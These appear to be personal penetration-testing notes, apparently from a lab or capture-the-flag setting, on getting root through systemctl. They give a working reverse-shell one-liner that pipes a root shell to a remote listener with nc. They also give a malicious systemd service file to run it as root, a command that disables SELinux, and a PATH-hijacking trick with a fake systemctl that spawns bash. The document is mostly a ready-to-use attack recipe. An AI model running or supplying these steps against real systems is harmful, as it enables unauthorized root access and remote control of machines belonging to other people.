Priv Esc using SysemCTL

This can be done when you find system ctl is running as root.
so we need to create my own service. that can be done by

METHOD - I

Create a file named test.sh in Target Machine

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9002 >/tmp/f

 

save it as test.sh → copy the file to

/home/bhanu/test.sh
chmod +x test.sh

  

now create a new service: → save it as mys.service

[Unit]
Description=Example systemd service.

[Service]
Type=simple
ExecStart=/bin/bash /home/bhanu/test.sh

[Install]
WantedBy=multi-user.target

# Another set of Service -  USE ONLY ONE SERVICE 

[Unit]
Description=Example systemd service.

[Service]
Type=simple
ExecStart=/bin/bash -p -c "id > /tmp/output"

[Install]
WantedBy=multi-user.target

#if you face any issues run below 2 commands 
sudo setenforce 0
sudo systemctl daemon-reload

#not mandatory 
chmod 644  /home/bhanu/mys.service 

# Start the Service
systemctl enable /home/bhanu/mys.service

#Check status incase of any errors
systemctl status /home/bhanu/mys.service

 

 open a new terminal in kali:

nc -nvlp 9002

 In Victim machine

systemctl start mys.service 

METHOD - II

This can be achieved by adding a new path when systemctl is running as root. 

 

echo $PATH

systemctl                 //runs the original systemctl 

cd /tmp

nano systemctl

bash                   //Add bash in systemctl file

 PATH=/tmp:$PATH

export PATH

systemctl                    //runs bash. explained above in method I

You need to run the systemctl as root to get the root shell.